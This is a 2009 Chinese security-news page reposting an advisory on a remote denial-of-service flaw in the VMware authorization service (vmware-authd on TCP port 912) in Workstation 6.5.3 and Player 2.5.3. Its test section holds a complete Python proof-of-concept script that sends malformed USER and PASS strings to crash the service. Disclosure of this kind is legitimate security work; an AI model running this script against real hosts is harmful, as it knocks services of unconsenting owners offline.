pc捍卫者
 当前位置 → pc捍卫者pc网络安全 → 浏览正文
VMware Player远程拒绝服务漏洞公布
作者:本站综合    来源:www.pchwz.com    更新时间:2009年10月10日

严重影响系统的正常运行:VMware Player远程拒绝服务漏洞公布

当此远程拒绝服务漏洞被利用时,严重影响系统的正常运行,甚至造成停止响应而当机.根据报告,确认VMware Workstation 6.5.3 build 185404和VMware Player 2.5.3 build 185404中的vmware-authd.exe 6.5.3.8888版本受此漏洞影响。其他版本也可能受此漏洞影响。

影响版本:
VMWare Workstation 6.5.3 build 185404
VMWare Player 2.5.3 build 185404漏洞描述:
Bugraq ID: 36630

VMware Player是一款可以让PC用户在Windows或Linux PC上很容易的运行虚拟机的免费软件。VMWare Workstation是一款流行的虚拟机应用程序。
当处理登录请求时VMware授权服务存在错误,通过提交包含 ’\xFF’字符的"USER"或"PASS"字符串给监听在TCP 912端口的"vmware-authd"进程,可导致服务停止响应。

<*参考 
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php
http://secunia.com/advisories/36988/
*>
测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d
    s.send(’USER \x25\xFF \r\n’)
    print ’Sending command "USER" + evil string...’
    d = s.recv(1024)
    print "Server response <- " + d
    s.send(’PASS \x25\xFF \r\n’)
    print ’Sending command "PASS" + evil string...’
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."
 SEBUG安全建议:
厂商解决方案:

目前没有详细解决方案提供:
http://www.vmware.com/

更多此远程拒绝服务漏洞的问题,请随时关注上面官方网站,是否提供解决方案.

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点

上一篇:恶意外挂易被人利用偷菜小心成肉鸡      下一篇完全控制PC:AdobeReader致命漏洞
Tags:
 
 
>> 推荐文章
·网络安全之12360崩了!
·最强手机芯片骁龙865跑分
·人民日报35岁现象怎么解析?
·卫星传输数据到iPhone的办法
·苹果手机销量暴降35%!
·红米K30普通版5G版,怎样选择K
·预计2025年5G用户渗透率为48
·红米K30真阉割版5G手机吗?
·Android 10与 iOS 1
·高通骁龙 865详细性能参数
·安卓的这个漏洞一直都还在
·苹果明年iPhone中或支持5G
·问题:5G网络什么时候才能普及?
·“携号转网”能否随心所欲?
·英特尔处理器缺货转投AMD
·国产OLED在市场的地位逐渐凸显
·交通安全日注重生命安全
·《携号转网服务管理规定》今起施行
>> 赞助商链接
|pc捍卫者|捍卫你地盘|唯尚技术|||版权声明|关于我们
本站文章除原创者其余源自网络,如有侵权请联系站长,将于24小时内删除